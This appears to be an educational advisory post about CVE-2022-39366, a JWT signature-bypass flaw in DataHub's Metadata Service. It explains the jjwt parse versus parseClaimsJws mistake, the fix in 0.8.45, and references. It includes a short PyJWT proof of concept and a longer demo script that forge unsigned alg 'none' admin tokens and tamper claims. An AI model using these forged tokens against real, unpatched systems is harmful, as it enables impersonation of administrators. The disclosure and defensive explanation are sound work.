Summary:
A critical security flaw, CVE-2022-39366, was found in DataHub, an open-source metadata platform, in its Metadata Service (GMS). The flaw allowed anyone to bypass authentication by sending an unsigned or self-forged JWT. If you are running DataHub before version 0.8.45 with Metadata Service authentication enabled, any client that can reach GMS can act as any user.
What is DataHub?
DataHub is LinkedIn’s open-source metadata platform, widely used for data discovery, governance, and lineage. It helps organizations better manage and understand their data assets across cloud and on-premises systems.
The Vulnerability: Unverified JWTs
The vulnerability lived in the StatelessTokenService of GMS. This service was expected to validate JWT (JSON Web Token) signatures before accepting the identity a token carries. Because of how it used io.jsonwebtoken.JwtParser (the jjwt library), a valid signature was never required.
How It Slips
The root cause is that the service called the parser's parse method instead of parseClaimsJws. parse accepts any structurally valid token, including an unsigned JWT whose header declares alg "none" and whose signature segment is empty, so a token the attacker wrote themselves is accepted regardless of legitimacy. parseClaimsJws, by contrast, only accepts a signed JWS and fails if the signature does not verify under the configured key.
Example vulnerable code (simplified)
```java
// Vulnerable: parse() also accepts unsigned tokens, so no signature check is enforced
Claims claims = (Claims) Jwts.parser()
    .parse(token)      // accepts a JWT with alg "none" and an empty signature
    .getBody();        // getBody() returns Object for parse(), hence the cast
// The claims are trusted without the signature ever being verified
```
For comparison, the correct call requires a signed JWS and verifies it:
```java
// Secure: parseClaimsJws() rejects unsigned tokens and verifies the signature
Claims claims = Jwts.parser()
    .setSigningKey(secretKey)   // key shared with the token issuer
    .parseClaimsJws(token)      // throws if the token is not a valid, signed JWS
    .getBody();
```
In the vulnerable version, an attacker could submit a token carrying arbitrary claims and be treated as any DataHub user.
Real-World Exploitation
Who’s at risk?
Any DataHub instance with Metadata Service authentication enabled, running a version before 0.8.45.
The attacker only has to write claims describing the identity they want, for example:
```json
{
  "roles": ["ADMIN"]
}
```
Proof-of-Concept (PoC) in Python
```python
import jwt  # pip install PyJWT

# With algorithm 'none' the header is {"alg": "none", ...} and the
# signature segment is left empty, so no key material is involved at all.
token = jwt.encode(
    {"sub": "admin", "roles": ["ADMIN"]},  # arbitrary claims
    key='',          # No secret needed!
    algorithm='none'
)
print(token)  # <header>.<payload>.  (trailing dot, empty signature)
# Now use this token to authenticate to DataHub.
```
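To make the difference between parse and parseClaimsJws concrete, here is an added Python model of both behaviours that is not part of the original post, DataHub or jjwt. It uses only the standard library: mint_hs256 plays the legitimate issuer, forge_unsigned builds the same alg "none" token as the PyJWT PoC above, tamper_claims swaps the payload of a genuine token while keeping its signature, lax_parse models parse (claims are returned without any signature requirement) and strict_parse models parseClaimsJws with a signing key. The secret, the HS256 algorithm and the claim names (sub, roles) are assumptions for the demo; the claim names DataHub actually expects are not given on this page.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret, not a real DataHub signing key.
DEMO_KEY = b"constructed-demo-secret-do-not-use"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _segment(obj: dict) -> str:
    return _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def mint_hs256(claims: dict, key: bytes) -> str:
    """Legitimate issuer: HS256-signed JWS (header.payload.signature)."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def forge_unsigned(claims: dict) -> str:
    """Attacker: same shape as the PyJWT PoC, alg 'none' and an empty signature."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def tamper_claims(token: str, claims: dict) -> str:
    """Attacker: replace the payload of a genuine token, keep header and signature."""
    header, _old_claims, sig = token.split(".")
    return f"{header}.{_segment(claims)}.{sig}"


def lax_parse(token: str, key: bytes = None) -> dict:
    """Models JwtParser.parse(): any structurally valid token yields its claims.
    The header is decoded but never enforced, so alg 'none' and a mismatched
    signature both pass. `key` is accepted only so both parsers share a signature."""
    header_b64, claims_b64, _sig_b64 = token.split(".")
    json.loads(_b64url_decode(header_b64))
    return json.loads(_b64url_decode(claims_b64))


def strict_parse(token: str, key: bytes) -> dict:
    """Models parseClaimsJws() with a signing key: only an HS256 JWS whose
    signature verifies under `key` yields claims; anything else raises."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, claims_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # algorithm pinned by the verifier, not the token
        raise ValueError(f"unsupported alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):  # constant-time
        raise ValueError("signature mismatch")
    return json.loads(_b64url_decode(claims_b64))


def accepts(parser, token: str, key: bytes) -> bool:
    """True if `parser` returns claims for `token`, False if it rejects it."""
    try:
        parser(token, key)
        return True
    except ValueError:  # covers JSONDecodeError and binascii.Error as well
        return False


if __name__ == "__main__":
    forged = forge_unsigned({"sub": "admin", "roles": ["ADMIN"]})
    genuine = mint_hs256({"sub": "alice", "roles": ["READER"]}, DEMO_KEY)
    tampered = tamper_claims(genuine, {"sub": "alice", "roles": ["ADMIN"]})
    for name, tok in (("forged alg=none", forged), ("genuine", genuine), ("tampered", tampered)):
        print(f"{name:16} lax={accepts(lax_parse, tok, DEMO_KEY)!s:5} "
              f"strict={accepts(strict_parse, tok, DEMO_KEY)}")
```

Running it shows the lax parser returning claims for all three tokens while the strict one accepts only the genuine token. The point the fix relies on is that the verifier decides which algorithm and key are acceptable; a parser that lets the token's own header decide (or, like parse, does not insist on a signature at all) can be talked into "none".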
The Patch
In version 0.8.45, the developers fixed this issue by verifying the JWT signature with the appropriate parser method.
Corrected Java snippet
```java
Claims claims = Jwts.parser()
    .setSigningKey(secretKey)   // the caller must now hold the signing key
    .parseClaimsJws(token)      // unsigned or mis-signed tokens are rejected
    .getBody();
```
Full patch details:
- PR: datahub PR #6783
- Change log: Release notes
There are no known workarounds—you must upgrade.
References
- NVD entry for CVE-2022-39366
- GitHub advisory GHSA-r5mh-2h6w-8g4v
- DataHub 0.8.45 Release
- JWT debugger - jwt.io
Takeaway
If you run DataHub behind authentication, you are only as safe as your JWT validation. CVE-2022-39366 shows how a trusted library can be misused: jjwt offers a parse method that does not insist on a verified signature, and choosing it over parseClaimsJws turned authentication into a formality. Keep your software up to date, use the verifying API of whatever JWT library you rely on, and review authentication logic regularly.
Patch now, and don't leave your metadata exposed!
*Questions or feedback? Connect with the DataHub community at DataHub Slack*
*This post is for educational awareness. Use responsibly.*
Timeline
Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/31/2022 17:48:00 UTC